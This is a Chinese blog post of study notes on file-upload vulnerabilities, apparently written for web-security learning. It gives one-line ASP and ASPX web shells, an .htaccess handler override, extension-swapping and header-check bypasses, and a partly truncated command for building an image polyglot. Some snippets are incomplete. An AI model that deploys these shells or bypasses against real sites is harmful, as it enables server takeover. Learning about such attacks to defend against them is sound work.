文件上传漏洞总结

最新推荐文章于 2024-01-19 16:52:32 发布
最新推荐文章于 2024-01-19 16:52:32 发布
阅读量165 收藏
点赞数
文章标签: web安全 学习 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129105906
版权

upload文件上传学习总结

1.文件上传漏洞原理

由于网站在对文件的上传功能中没有严格校验上传文件后缀和文件类型,导致上传的文件可以被解析成可执行的脚本文件(php、jsp、xml、cer等文件),以来达到攻击者的攻击目的

常用的一句话木马:

php一句话木马:

asp一句话木马: <%eval request("value")%>

aspx一句话木马: <%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>

1.前端绕过,抓包修改缀名(.png/.jpge/gif/....)

绕过方法:

  • 将需要上传的恶意代码文件类型改为允许上传的类型,例如将dama.asp改为dama.jpg上传,配置Burp Suite代理进行抓包,然后再将文件名dama.jpg改为dama.asp。

2.上传.htaccess文件攻击

<FilesMatch "指定文件">

SetHandler application/x-httpd-php

我们上传的.htaccess可以覆盖掉原理的文件

3.白名单策略

白名单策略就是将规定在名单以内的文件其他文件全部都看作不合法

4.检测Cotent-Type修改

5.检查文件头(参考CSDN博主「拓海AE」的原创文章)

不同类型文件的文件头或者标志位实际上是不一样的,后端能够根据这些内容来判断是什么类型的文件。

这些是常见的图像格式的文件头:

list($width, $height, $type, $attr) = getimagesize("img/flag.jpg");

$ext = image_type_to_extension($type);

$image_type = exif_imagetype("img/flag.jpg");

getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。

image_type_to_extension() 根据给定的常量 IMAGETYPE_XXX 返回后缀名。

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

6.制作 图片🐎

代码:

copy sxc.png/b+info.php/a info.pn

Harder.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞
sc_Pease的博客
12-29 1097
参考文章https://blog.csdn.net/m0_38103658/article/details/100162185 一、漏洞简介 1,主要针对弱点:数据与代码分离 2,漏洞等级:高危 3,漏洞原理:利用网站的上传功能,攻击者上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,在访问脚本过程中访问到恶意代码,进而获得网站控制权。 (图片摘自上述链接) 4,漏洞原因:程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或
上传文件漏洞总结
01-10
上传文件的总结上传文件的总结上传文件的总结上传文件的总结
fortify规则包概述
06-01
NULL 博文链接:https://hoochiang.iteye.com/blog/2070813
fortify关于Often Misused: File Upload的解决办法
BitterSweetcoffe的博客
06-13 1929
前言,最近公司强调要把fortify漏洞修复为0,而关于这个漏洞,在网上搜索好久,一直没有得到解决办法,然后自己突发奇想,试着让它扫描不到,然后还真的成功了,下面上干活,绝对原创,自己想的,虽然开发才一年,但是程序员的成就感不就来自于解决一些问题后的分享喜悦。5.总结:原理其实就是让fortify认为他是对象,未扫描到MultipartFile,就可以不报漏洞了,当然,最主要的,一定要在自己代码对传入的文件进行判断,不然会有安全问题哦。3.然后原来代码需要改一下。
文件上传漏洞学习总结(upload-labs)
古语静水流深
06-11 2070
1.什么是文件上传漏洞文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 2. ...
文件上传漏洞的思维导图
04-19
总结文件上传漏洞的相关知识
上传攻击漏洞总结
06-12
文件介绍了主流的文件上传漏洞,以及如何绕过文件检测来达到上传的目的。
javaWeb安全验证漏洞修复总结
08-26
目前很多业务都依赖于互联网,例如说网上银行、网络购物、网游等,很多恶意...同时,对Web服务器的攻击也可以说是形形色色、种类繁多,常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver漏洞进行攻击。
上传漏洞总结(私人珍藏)
12-31
好东西和大家分享啦,私人珍藏宝贝,全部上传漏洞总结
文件上传漏洞的原理与解析
jdk12123的博客
09-17 355
这意味着如果您向这段代码发送一个POST请求,并在请求中包含名为"1"的参数,那么该参数的值将被当作PHP代码来执行。这样的代码结构非常危险,因为它可能会使攻击者执行任意的PHP代码,并对服务器进行恶意操作。提供了针对目录改变配。置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所。然后,我们可以进一步跟据目录去获取文件,之后我们根据CTF题目去实践一下。怎么是假的,返回页面,使用phpinfo();诶怎么不行啊,ls是Linux的,windows是dir。
Web安全-文件上传漏洞(常见上传解析漏洞,常见检测方式绕过)
m0_74220316的博客
07-04 2028
Webshell是一种利用Web服务器的漏洞或弱点,通过远程上传恶意代码到服务器上(实质上是一种网页后门),并执行命令或控制服务器的一种攻击方式。在上传过后,该文件与网站服务器web目录下的正常网页文件混在一起,然后就可以通过该文件得到一个命令执行环境攻击者可以通过Webshell获取服务器的高权限,进而进行非法操作,例如修改服务器文件、数据库操作、执行系统命令等。Webshell具有隐蔽性高、操作方便等特点,常被用于非法攻击、入侵行为或用于进行系统安全评估和渗透测试。
常见文件上传漏洞利用
weixin_44414845的博客
12-14 3598
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
文件上传漏洞(全网最详细)
qq_61553520的博客
04-19 1万+
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
[Web安全]文件上传漏洞及绕过基础详解+实操-转载
elevn的博客
07-26 933
文件上传漏洞很多网站都可以对其上传文件,比如上传头像,上传个人主页的背景等等。文件上传漏洞就是利用服务器的这一机制对其上传一些特殊文件(如木马),如果服务端网站对其过滤不严,就会使木马文件成功被上传到服务器,攻击者可以利用上传的木马文件对服务器进行一系列操作(提权、反弹Shell等),这样就造成了目标网站的资产损失,这就是文件上传漏洞。那么什么叫做WebShell呢?前文说了Webshell是一种网页后门,通常用用asp、jsp或者php编写。
开发安全之:Often Misused: File Upload
最新发布
irizhao的专栏
01-19 673
如果允许攻击者向某个可通过 Web 访问的目录上传文件,并能够将这些文件传递给代码解释器(如 JSP/ASPX/PHP),他们就能促使这些文件中包含的恶意代码在服务器上执行。如果程序容易出现 path manipulation、command injection 或危险的 file inclusion 漏洞,那么攻击者就可能上传带恶意内容的文件,并利用另一种漏洞促使程序读取或执行该文件。如果程序必须允许文件上传,则应当只接受程序需要的特定类型的内容,从而阻止攻击者提供恶意内容。
文件上传漏洞实验报告
qq_65197898的博客
03-21 4823
文件上传漏洞 一、因为刷新但是上传没消失所以这是个前端 将一个带有一句话木马的.txt文件改为可上传的文件格式 打开代理和Burp Suit软件抓包不要关拦截上传在bp中将后缀改为.php放行 右击图片复制图片链接获得位置 中国蚁剑添加进入 二、查看源码得知仅检查了类型,将类型改为图片格式这里改为(jpeg、png、gif) 三、上传得知时这是黑名单查看源码得知会过滤:$TADA所以在抓到的包中将文件名后双写$TADA进行绕过 四、查看源码得知没有禁用.hatcces...
关于Fortify 代码安全扫描常见问题
热门推荐
qq_33200504的博客
11-17 2万+
#Mass Assigment:Insecure Binder Configuration 问题说明: 不安全的参数绑定配置,是指我们的controller中xxxMethod(User user) 未明确指定接口所需属性,而是把整个对象所有属性暴露出去。 解决方案: 接口中入参对象未明确指定接口所需属性,而是把整个对象所有属性暴露出去。接口入参如果是某个具体对象需要使用@RequestBody标签,不需要的属性可用@JsonIgnore注解,前端接口调用时需使用标准json格式传递参数。方案参考:http
文件上传漏洞 找绝对路径
07-27
总结起来,要找到文件上传漏洞的绝对路径,需要通过上传文件并修改扩展名或内容来绕过服务器的文件类型检查,然后查找上传文件的保存路径,并使用相应的工具连接服务器并执行代码。 #### 引用[.reference_title] - *...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值